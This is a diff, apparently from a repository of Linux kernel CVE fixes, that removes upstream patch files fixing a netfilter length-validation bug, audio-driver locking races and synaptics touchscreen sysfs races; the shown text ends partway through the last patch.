-Cc: Mateusz Guzik
-Cc: Alexey Dobriyan
-Cc: Cyrill Gorcunov
-Cc: Jarod Wilson
-Signed-off-by: Andrew Morton
-Signed-off-by: Linus Torvalds
----
- fs/proc/base.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/fs/proc/base.c b/fs/proc/base.c
-index b1755b2..92e37e2 100644
---- a/fs/proc/base.c
-+++ b/fs/proc/base.c
-@@ -955,7 +955,8 @@ static ssize_t environ_read(struct file *file, char __user *buf,
- struct mm_struct *mm = file->private_data;
- unsigned long env_start, env_end;
-
-- if (!mm)
-+ /* Ensure the process spawned far enough to have an environment. */
-+ if (!mm || !mm->env_end)
- return 0;
-
- page = (char *)__get_free_page(GFP_TEMPORARY);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-7917/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-7917/ANY/0001.patch
deleted file mode 100644
index 6cbbe4e2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-7917/ANY/0001.patch
+++ /dev/null
@@ -1,76 +0,0 @@
-From c58d6c93680f28ac58984af61d0a7ebf4319c241 Mon Sep 17 00:00:00 2001
-From: Phil Turnbull
-Date: Tue, 2 Feb 2016 13:36:45 -0500
-Subject: netfilter: nfnetlink: correctly validate length of batch messages
-
-If nlh->nlmsg_len is zero then an infinite loop is triggered because
-'skb_pull(skb, msglen);' pulls zero bytes.
-
-The calculation in nlmsg_len() underflows if 'nlh->nlmsg_len <
-NLMSG_HDRLEN' which bypasses the length validation and will later
-trigger an out-of-bound read.
-
-If the length validation does fail then the malformed batch message is
-copied back to userspace. However, we cannot do this because the
-nlh->nlmsg_len can be invalid. This leads to an out-of-bounds read in
-netlink_ack:
-
- [ 41.455421] ==================================================================
- [ 41.456431] BUG: KASAN: slab-out-of-bounds in memcpy+0x1d/0x40 at addr ffff880119e79340
- [ 41.456431] Read of size 4294967280 by task a.out/987
- [ 41.456431] =============================================================================
- [ 41.456431] BUG kmalloc-512 (Not tainted): kasan: bad access detected
- [ 41.456431] -----------------------------------------------------------------------------
- ...
- [ 41.456431] Bytes b4 ffff880119e79310: 00 00 00 00 d5 03 00 00 b0 fb fe ff 00 00 00 00 ................
- [ 41.456431] Object ffff880119e79320: 20 00 00 00 10 00 05 00 00 00 00 00 00 00 00 00 ...............
- [ 41.456431] Object ffff880119e79330: 14 00 0a 00 01 03 fc 40 45 56 11 22 33 10 00 05 .......@EV."3...
- [ 41.456431] Object ffff880119e79340: f0 ff ff ff 88 99 aa bb 00 14 00 0a 00 06 fe fb ................
- ^^ start of batch nlmsg with
- nlmsg_len=4294967280
- ...
- [ 41.456431] Memory state around the buggy address:
- [ 41.456431] ffff880119e79400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- [ 41.456431] ffff880119e79480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
- [ 41.456431] >ffff880119e79500: 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc fc
- [ 41.456431] ^
- [ 41.456431] ffff880119e79580: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- [ 41.456431] ffff880119e79600: fc fc fc fc fc fc fc fc fc fc fb fb fb fb fb fb
- [ 41.456431] ==================================================================
-
-Fix this with better validation of nlh->nlmsg_len and by setting
-NFNL_BATCH_FAILURE if any batch message fails length validation.
-
-CAP_NET_ADMIN is required to trigger the bugs.
-
-Fixes: 9ea2aa8b7dba ("netfilter: nfnetlink: validate nfnetlink header from batch")
-Signed-off-by: Phil Turnbull
-Signed-off-by: Pablo Neira Ayuso
----
- net/netfilter/nfnetlink.c | 10 ++++++----
- 1 file changed, 6 insertions(+), 4 deletions(-)
-
-diff --git a/net/netfilter/nfnetlink.c b/net/netfilter/nfnetlink.c
-index 62e92af..857ae89 100644
---- a/net/netfilter/nfnetlink.c
-+++ b/net/netfilter/nfnetlink.c
-@@ -328,10 +328,12 @@ replay:
- nlh = nlmsg_hdr(skb);
- err = 0;
-
-- if (nlmsg_len(nlh) < sizeof(struct nfgenmsg) ||
-- skb->len < nlh->nlmsg_len) {
-- err = -EINVAL;
-- goto ack;
-+ if (nlh->nlmsg_len < NLMSG_HDRLEN ||
-+ skb->len < nlh->nlmsg_len ||
-+ nlmsg_len(nlh) < sizeof(struct nfgenmsg)) {
-+ nfnl_err_reset(&err_list);
-+ status |= NFNL_BATCH_FAILURE;
-+ goto done;
- }
-
- /* Only requests are handled by the kernel */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8391/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8391/ANY/0001.patch
deleted file mode 100644
index 5db9e5c2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8391/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From 30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Thu, 13 Oct 2016 10:48:39 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang
----
- arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c | 20 +++++++++++++++++---
- 1 file changed, 17 insertions(+), 3 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-index 5bdd10a..4455368 100644
---- a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2013,2016 The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -562,6 +562,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- struct q6audio_aio *audio = file->private_data;
- pr_debug("%s[%p]\n", __func__, audio);
- mutex_lock(&audio->lock);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- audio->wflush = 1;
- if (audio->enabled)
- audio_aio_flush(audio);
-@@ -577,6 +579,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- audio_aio_reset_event_queue(audio);
- q6asm_audio_client_free(audio->ac);
- mutex_unlock(&audio->lock);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- mutex_destroy(&audio->lock);
- mutex_destroy(&audio->read_lock);
- mutex_destroy(&audio->write_lock);
-@@ -1349,8 +1353,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- mutex_lock(&audio->lock);
- if (copy_from_user(&info, (void *)arg, sizeof(info)))
- rc = -EFAULT;
-- else
-+ else{
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_add(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
-+ }
- mutex_unlock(&audio->lock);
- break;
- }
-@@ -1360,8 +1369,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- pr_debug("%s[%p]:AUDIO_DEREGISTER_ION\n", __func__, audio);
- if (copy_from_user(&info, (void *)arg, sizeof(info)))
- rc = -EFAULT;
-- else
-+ else{
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_remove(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
-+ }
- mutex_unlock(&audio->lock);
- break;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8391/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-8391/ANY/0002.patch
deleted file mode 100644
index 01fe5416..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8391/ANY/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From 62580295210b6c0bd809cde7088b45ebb65ace79 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Wed, 28 Sep 2016 20:11:23 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 22 +++++++++++++++++++++-
- 1 file changed, 21 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 8041111..7a4bae3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -570,6 +570,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- struct q6audio_aio *audio = file->private_data;
- pr_debug("%s[%p]\n", __func__, audio);
- mutex_lock(&audio->lock);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- audio->wflush = 1;
- if (audio->enabled)
- audio_aio_flush(audio);
-@@ -584,6 +586,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- wake_up(&audio->event_wait);
- audio_aio_reset_event_queue(audio);
- q6asm_audio_client_free(audio->ac);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- mutex_unlock(&audio->lock);
- mutex_destroy(&audio->lock);
- mutex_destroy(&audio->read_lock);
-@@ -1679,7 +1683,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- __func__);
- rc = -EFAULT;
- } else {
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_add(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- }
- mutex_unlock(&audio->lock);
- break;
-@@ -1694,7 +1702,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- __func__);
- rc = -EFAULT;
- } else {
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_remove(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- }
- mutex_unlock(&audio->lock);
- break;
-@@ -1996,7 +2008,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- } else {
- info.fd = info_32.fd;
- info.vaddr = compat_ptr(info_32.vaddr);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_add(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- }
- mutex_unlock(&audio->lock);
- break;
-@@ -2013,7 +2029,11 @@ static long
audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- } else {
- info.fd = info_32.fd;
- info.vaddr = compat_ptr(info_32.vaddr);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_remove(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- }
- mutex_unlock(&audio->lock);
- break;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8392/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8392/ANY/0001.patch
deleted file mode 100644
index 5db9e5c2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8392/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From 30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Thu, 13 Oct 2016 10:48:39 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang
----
- arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c | 20 +++++++++++++++++---
- 1 file changed, 17 insertions(+), 3 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-index 5bdd10a..4455368 100644
---- a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2013,2016 The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -562,6 +562,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- struct q6audio_aio *audio = file->private_data;
- pr_debug("%s[%p]\n", __func__, audio);
- mutex_lock(&audio->lock);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- audio->wflush = 1;
- if (audio->enabled)
- audio_aio_flush(audio);
-@@ -577,6 +579,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- audio_aio_reset_event_queue(audio);
- q6asm_audio_client_free(audio->ac);
- mutex_unlock(&audio->lock);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- mutex_destroy(&audio->lock);
- mutex_destroy(&audio->read_lock);
- mutex_destroy(&audio->write_lock);
-@@ -1349,8 +1353,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- mutex_lock(&audio->lock);
- if (copy_from_user(&info, (void *)arg, sizeof(info)))
- rc = -EFAULT;
-- else
-+ else{
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_add(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
-+ }
- mutex_unlock(&audio->lock);
- break;
- }
-@@ -1360,8 +1369,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- pr_debug("%s[%p]:AUDIO_DEREGISTER_ION\n", __func__, audio);
- if (copy_from_user(&info, (void *)arg, sizeof(info)))
- rc = -EFAULT;
-- else
-+ else{
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_remove(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
-+ }
- mutex_unlock(&audio->lock);
- break;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8392/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-8392/ANY/0002.patch
deleted file mode 100644
index 01fe5416..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8392/ANY/0002.patch
+++ /dev/null
@@ -1,97 +0,0 @@
-From 62580295210b6c0bd809cde7088b45ebb65ace79 Mon Sep 17 00:00:00 2001
-From: Walter Yang
-Date: Wed, 28 Sep 2016 20:11:23 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang
----
- drivers/misc/qcom/qdsp6v2/audio_utils_aio.c | 22 +++++++++++++++++++++-
- 1 file changed, 21 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-index 8041111..7a4bae3 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
- * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2016, The Linux Foundation. All rights reserved.
- *
- * This software is licensed under the terms of the GNU General Public
- * License version 2, as published by the Free Software Foundation, and
-@@ -570,6 +570,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- struct q6audio_aio *audio = file->private_data;
- pr_debug("%s[%p]\n", __func__, audio);
- mutex_lock(&audio->lock);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- audio->wflush = 1;
- if (audio->enabled)
- audio_aio_flush(audio);
-@@ -584,6 +586,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- wake_up(&audio->event_wait);
- audio_aio_reset_event_queue(audio);
- q6asm_audio_client_free(audio->ac);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- mutex_unlock(&audio->lock);
- mutex_destroy(&audio->lock);
- mutex_destroy(&audio->read_lock);
-@@ -1679,7 +1683,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- __func__);
- rc = -EFAULT;
- } else {
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_add(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- }
- mutex_unlock(&audio->lock);
- break;
-@@ -1694,7 +1702,11 @@ static long audio_aio_ioctl(struct file *file, unsigned int cmd,
- __func__);
- rc = -EFAULT;
- } else {
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_remove(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- }
- mutex_unlock(&audio->lock);
- break;
-@@ -1996,7 +2008,11 @@ static long audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- } else {
- info.fd = info_32.fd;
- info.vaddr = compat_ptr(info_32.vaddr);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_add(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- }
- mutex_unlock(&audio->lock);
- break;
-@@ -2013,7 +2029,11 @@ static long
audio_aio_compat_ioctl(struct file *file, unsigned int cmd,
- } else {
- info.fd = info_32.fd;
- info.vaddr = compat_ptr(info_32.vaddr);
-+ mutex_lock(&audio->read_lock);
-+ mutex_lock(&audio->write_lock);
- rc = audio_aio_ion_remove(audio, &info);
-+ mutex_unlock(&audio->write_lock);
-+ mutex_unlock(&audio->read_lock);
- }
- mutex_unlock(&audio->lock);
- break;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-8393/ANY/0001.patch
deleted file mode 100644
index e2c7abee..00000000
--- a/Patches/Linux_CVEs/CVE-2016-8393/ANY/0001.patch
+++ /dev/null
@@ -1,444 +0,0 @@ -From 9397e20764da2fdffdfe20e35cb78211753b83cc Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Wed, 14 Sep 2016 17:21:48 -0700 -Subject: [PATCH] input: synaptics: prevent sysfs races - -concurrent sysfs calls on the fw updater can cause -ugly race conditions. Return EBUSY on concurrent sysfs calls. - -For sysfs calls which generate deferred work, prevent -the deferred work from running concurrently with other -sysfs calls. - -Change-Id: Ie33add946fbcca8309998e4cb7cb01525c667c7e -Signed-off-by: Andrew Chant -Bug: 31252388 ---- - drivers/input/touchscreen/synaptics_fw_update.c | 144 ++++++++++++++++++------ - 1 file changed, 109 insertions(+), 35 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c -index 79b3a780550b8..ffa992b829a5a 100644 ---- a/drivers/input/touchscreen/synaptics_fw_update.c -+++ b/drivers/input/touchscreen/synaptics_fw_update.c -@@ -22,6 +22,7 @@ - #include - #include - #include -+#include - #include - #include - #include -@@ -296,6 +297,7 @@ struct synaptics_rmi4_fwu_handle { - static struct synaptics_rmi4_fwu_handle *fwu; - - DECLARE_COMPLETION(fwu_remove_complete); -+DEFINE_MUTEX(fwu_sysfs_mutex); - - static unsigned int extract_uint(const unsigned char *ptr) - { -@@ -1713,34 +1715,47 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file, - char *buf, loff_t pos, size_t count) - { - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; -+ ssize_t retval; -+ -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - - if (count < fwu->config_size) { - dev_err(&rmi4_data->i2c_client->dev, - "%s: Not enough space (%zu bytes) in buffer\n", - __func__, count); -- return -EINVAL; -+ retval = -EINVAL; -+ goto show_image_exit; - } - - memcpy(buf, fwu->read_config_buf, fwu->config_size); -- -- return fwu->config_size; -+ retval = fwu->config_size; -+show_image_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t 
fwu_sysfs_store_image(struct file *data_file, - struct kobject *kobj, struct bin_attribute *attributes, - char *buf, loff_t pos, size_t count) - { -+ ssize_t retval; -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (!fwu->ext_data_source) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot use this without setting imagesize!\n"); -- return -EAGAIN; -+ retval = -EAGAIN; -+ goto store_image_exit; - } - - if (count > fwu->image_size - fwu->data_pos) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "%s: Not enough space in buffer\n", - __func__); -- return -EINVAL; -+ retval = -EINVAL; -+ goto store_image_exit; - } - - memcpy((void *)(&fwu->ext_data_source[fwu->data_pos]), -@@ -1749,8 +1764,11 @@ static ssize_t fwu_sysfs_store_image(struct file *data_file, - - fwu->data_buffer = fwu->ext_data_source; - fwu->data_pos += count; -+ retval = count; - -- return count; -+store_image_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_image_name_store(struct device *dev, -@@ -1758,11 +1776,15 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev, - { - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - char *strptr; -+ ssize_t retval; -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - - if (count >= NAME_BUFFER_SIZE) { - dev_err(&rmi4_data->i2c_client->dev, - "Input over %d characters long\n", NAME_BUFFER_SIZE); -- return -EINVAL; -+ retval = -EINVAL; -+ goto image_name_store_exit; - } - - strptr = strnstr(buf, ".img", -@@ -1770,21 +1792,32 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev, - if (!strptr) { - dev_err(&rmi4_data->i2c_client->dev, - "Input is not valid .img file\n"); -- return -EINVAL; -+ retval = -EINVAL; -+ goto image_name_store_exit; - } - - strlcpy(rmi4_data->fw_image_name, buf, count); -- return count; -+ retval = count; -+ -+image_name_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_image_name_show(struct 
device *dev, - struct device_attribute *attr, char *buf) - { -+ ssize_t retval; -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; - if (strnlen(fwu->rmi4_data->fw_image_name, NAME_BUFFER_SIZE) > 0) -- return snprintf(buf, PAGE_SIZE, "%s\n", -+ retval = snprintf(buf, PAGE_SIZE, "%s\n", - fwu->rmi4_data->fw_image_name); - else -- return snprintf(buf, PAGE_SIZE, "No firmware name given\n"); -+ retval = snprintf(buf, PAGE_SIZE, "No firmware name given\n"); -+ -+ mutex_unlock(&fwu_sysfs_mutex); -+ return retval; - } - - static ssize_t fwu_sysfs_force_reflash_store(struct device *dev, -@@ -1794,14 +1827,17 @@ static ssize_t fwu_sysfs_force_reflash_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto force_reflash_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto force_reflash_store_exit; - } - if (LOCKDOWN) - fwu->do_lockdown = true; -@@ -1812,16 +1848,18 @@ static ssize_t fwu_sysfs_force_reflash_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to do reflash\n", - __func__); -- goto exit; -+ goto force_reflash_store_free_exit; - } - - retval = count; - --exit: -+force_reflash_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->force_update = FORCE_UPDATE; - fwu->do_lockdown = rmi4_data->board->do_lockdown; -+force_reflash_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -1832,9 +1870,12 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto reflash_store_exit; - } - - if (input & LOCKDOWN) { -@@ -1844,7 +1885,7 @@ 
static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - - if ((input != NORMAL) && (input != FORCE)) { - retval = -EINVAL; -- goto exit; -+ goto reflash_store_exit; - } - - if (input == FORCE) -@@ -1855,16 +1896,18 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to do reflash\n", - __func__); -- goto exit; -+ goto reflash_store_free_exit; - } - - retval = count; - --exit: -+reflash_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->force_update = FORCE_UPDATE; - fwu->do_lockdown = rmi4_data->board->do_lockdown; -+reflash_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -1875,26 +1918,31 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto lockdown_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto lockdown_store_exit; - } - - if (!fwu->ext_data_source) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot use this without loading image in manual way!\n"); -- return -EAGAIN; -+ retval = -EAGAIN; -+ goto lockdown_store_exit; - } - - if (fwu->rmi4_data->suspended == true) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot lockdown while device is in suspend\n"); -- return -EBUSY; -+ retval = -EBUSY; -+ goto lockdown_store_exit; - } - - retval = fwu_start_write_lockdown(); -@@ -1902,16 +1950,18 @@ static ssize_t fwu_sysfs_write_lockdown_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to write lockdown block\n", - __func__); -- goto exit; -+ goto lockdown_store_free_exit; - } - - retval = count; - --exit: -+lockdown_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = NULL; - fwu->force_update = FORCE_UPDATE; - 
fwu->do_lockdown = rmi4_data->board->do_lockdown; -+lockdown_store_exit: -+ mutex_unlock(&fwu_sysfs_mutex); - return retval; - } - -@@ -1920,6 +1970,8 @@ static ssize_t fwu_sysfs_check_fw_store(struct device *dev, - { - unsigned int input = 0; - -+ /* Takes fwu_sysfs_mutex in the deferred work function. */ -+ - if (sscanf(buf, "%u", &input) != 1) - return -EINVAL; - -@@ -1942,26 +1994,31 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev, - unsigned int input; - struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data; - -+ if (!mutex_trylock(&fwu_sysfs_mutex)) -+ return -EBUSY; -+ - if (sscanf(buf, "%u", &input) != 1) { - retval = -EINVAL; -- goto exit; -+ goto write_config_store_exit; - } - - if (input != 1) { - retval = -EINVAL; -- goto exit; -+ goto write_config_store_exit; - } - - if (!fwu->ext_data_source) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot use this without loading image in manual way!\n"); -- return -EAGAIN; -+ retval = -EAGAIN; -+ goto write_config_store_exit; - } - - if (fwu->rmi4_data->suspended == true) { - dev_err(&fwu->rmi4_data->i2c_client->dev, - "Cannot write config while device is in suspend\n"); -- return -EBUSY; -+ retval = -EBUSY; -+ goto write_config_store_exit; - } - - retval = fwu_start_write_config(); -@@ -1969,14 +2026,16 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev, - dev_err(&rmi4_data->i2c_client->dev, - "%s: Failed to write config\n", - __func__); -- goto exit; -+ goto write_config_store_free_exit; - } - - retval = count; - --exit: -+write_config_store_free_exit: - kfree(fwu->ext_data_source); - fwu->ext_data_source = 